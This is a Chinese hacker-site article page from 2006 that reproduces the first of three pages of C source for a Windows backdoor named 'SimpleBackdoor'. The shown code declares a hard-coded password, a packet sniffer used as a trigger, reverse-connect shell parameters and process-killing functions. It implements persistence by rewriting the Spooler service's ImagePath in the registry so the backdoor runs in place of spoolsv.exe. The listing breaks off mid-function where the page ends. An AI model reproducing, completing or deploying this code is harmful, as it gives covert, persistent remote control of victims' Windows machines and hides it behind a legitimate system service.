| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文 用户登录 新用户注册
  简单的无驱动嗅探启动后门        【字体:
简单的无驱动嗅探启动后门
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
Codz

CODE:

////////////////////////////////////////////////////////////////////////////////
//FileName:SimpleBackDoor
//Author:云舒(yunshu@ph4nt0m.org)
//Date:2005-11-5
//Modify:2005-11-15
//Modify:2006-1-1
////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#include <mstcpip.h>
#include <tlhelp32.h>

///////////////////////////////////////////////////////////////////////////////
//宏定义
///////////////////////////////////////////////////////////////////////////////

#define BUFFER_SIZE 1024 * 10
#define SERVICE_NAME "SimpleBackdoor"
#define SERVICE_DESCRIPTION "Just a simple backdoor"
#define SERVICE_DISPLAY_NAME "SimpleBackdoor"
#define PASSWORD "WhereAreYou,Icy" //后门密码
#define REPLACE_SERVICE_NAME "Spooler" //要替换的服务
#define FLAG "Icy\>" //shell的标识符

//#define DEBUG

#ifdef DEBUG
#define DEBUG_LOG "c:\debug.txt"
#endif

///////////////////////////////////////////////////////////////////////////////
//全局变量
///////////////////////////////////////////////////////////////////////////////

typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;

typedef struct tcp_hdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;

typedef struct shell_argument //传递到shell的参数结构
{
char ip[16]; //反连的ip地址
char port[5]; //反连的端口
}SHELL_ARGUMENT;

BOOL isRunning; //服务是否在运行
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE hServiceStatus;

///////////////////////////////////////////////////////////////////////////////
//函数原形
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceInstall( char * ); //安装服务
BOOL ServiceUnstall( char * ); //删除服务
void ServiceControl( DWORD ); //控制服务
void ServiceMain( DWORD, char **); //服务入口
int StartDoor( LPVOID ); //启动后门
BOOL StartWith( char *, char * ); //判断第一个字符串是否以第二个开头
void LogToFile( char * ); //日志记录
void Help( char * ); //帮助
int Sniffer( void ); //嗅探
int DecodeTCP( char * ); //解包
int StartShell( SOCKET ); //执行shell
int ListProcess( SOCKET ); //列举进程
int KillProcess( SOCKET, char * ); //杀进程

///////////////////////////////////////////////////////////////////////////////
//程序入口,主函数
///////////////////////////////////////////////////////////////////////////////

int main( int argc, char *argv[] )
{
char filePath[MAX_PATH] = { 0 }; //程序本身路径
SERVICE_TABLE_ENTRY serviceTable[2];

serviceTable[0].lpServiceName = SERVICE_NAME;
serviceTable[0].lpServiceProc = ( LPSERVICE_MAIN_FUNCTION )ServiceMain;

serviceTable[1].lpServiceName = NULL;
serviceTable[1].lpServiceProc = NULL;

GetModuleFileName( NULL, filePath, MAX_PATH );

#ifdef DEBUG
LogToFile( "Call main\n" );
#endif

if( argc == 2 && (!stricmp( argv[1], "-install" )) )
{
if( ServiceInstall( filePath ) != TRUE )
{
printf( "Install service error\n" );
return -1;
}
printf( "Install service successful\n" );
}

else if( argc == 2 && (!stricmp( argv[1], "-unstall" )) )
{
if( ServiceUnstall( SERVICE_NAME ) != TRUE )
{
printf( "Delete service error\n" );
return -1;
}
printf( "Delete service successful\n" );
}

else
{
Help( argv[0] );

if( !StartServiceCtrlDispatcher( serviceTable ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Main StartServiceCtrlDispatcher error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}
}

return 0;
}

///////////////////////////////////////////////////////////////////////////////
//安装服务函数
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceInstall( char * exeFilePath )
{
char tmpPath[MAX_PATH] = { 0 };
HKEY key;

#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Path is : %s\n", exeFilePath );
LogToFile( tmp );
#endif

/*这是安装成新服务,注释掉
SC_HANDLE serviceMangerHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE );
if ( serviceMangerHandle == 0 )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open services manager database error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

printf( "Install: Open services manager database error: %d\n", GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open services manager database successful\n" );
#endif

SC_HANDLE serviceHandle = CreateService
(
serviceMangerHandle ,
SERVICE_NAME ,
SERVICE_DISPLAY_NAME ,
SERVICE_ALL_ACCESS ,
SERVICE_WIN32_OWN_PROCESS ,
SERVICE_AUTO_START ,
SERVICE_ERROR_NORMAL ,
exeFilePath ,
NULL ,
NULL ,
NULL ,
NULL ,
NULL
);

if ( serviceHandle == 0 )
{
printf( "Create service error: %d\n", GetLastError() );

CloseServiceHandle( serviceMangerHandle );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: create services successful\n" );
#endif

strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, SERVICE_NAME );

if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

RegSetValueEx( key, "Description", 0, REG_SZ, (BYTE *)SERVICE_DESCRIPTION, strlen(SERVICE_DESCRIPTION) );

#ifdef DEBUG
LogToFile( "Install: write regedit successful\n" );
#endif

RegCloseKey(key);
CloseServiceHandle( serviceHandle );
CloseServiceHandle( serviceMangerHandle );

return TRUE;
*/

//替换系统服务Spooler的执行路径,改为后门程序
strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, REPLACE_SERVICE_NAME );

if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

if( RegSetValueEx( key,
"ImagePath",
0,
REG_EXPAND_SZ,
(BYTE *)exeFilePath,
strlen(exeFilePath) ) != ERROR_SUCCESS )

{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Set key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Set key %s error: %d\n", tmpPath, GetLastError() );

return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: write regedit successful\n" );
#endif

RegCloseKey(key);

return TRUE;
}

///////////////////////////////////////////////////////////////////////////////
//删除服务函数
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceUnstall( char * serviceName )
{
/*删除新服务,现在替换服务不用这样删除
SC_HANDLE scmHandle = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS);

if ( scmHandle == NULL )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceUntall: open services database error while delete service: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return FALSE;
}

SC_HANDLE scHandle = OpenService( scmHandle, serviceName, SERVICE_ALL_ACCESS );

if( scHandle == NULL )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceUntall: open services database error while delete service: %d\n", GetLastError() );
LogToFile( tmp );
#endif

CloseServiceHandle( scmHandle );

return FALSE;
}

DeleteService( scHandle );

CloseServiceHandle( scHandle );
CloseServiceHandle( scmHandle );

return TRUE;
*/

char tmpPath[MAX_PATH] = { 0 };
HKEY key;
char *oldFilePath = "%systemroot%\system32\spoolsv.exe";

strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, REPLACE_SERVICE_NAME );

if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

if( RegSetValueEx( key,
"ImagePath",
0,
REG_EXPAND_SZ,
(BYTE *)oldFilePath,
strlen(oldFilePath) ) != ERROR_SUCCE

[1] [2] [3] 下一页

文章录入:IceRiver    责任编辑:IceRiver 
  • 上一篇文章:

  • 下一篇文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    简单了解局域网内部的ARP攻击
    推荐:找寻蛛丝马迹 简单方法
    shell编程例子 -- 一个简单的
    浏览器遭恶意修改 简单有效的
    简单打造不死鸽子
    简单五步骤预防AV终结者病毒
    简单方法检测电脑是否中病毒
    IP地址冲突简单查找方法与预
    做黑客很简单 用IE浏览器实
    探密QQ登陆加密算法兼谈简单
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.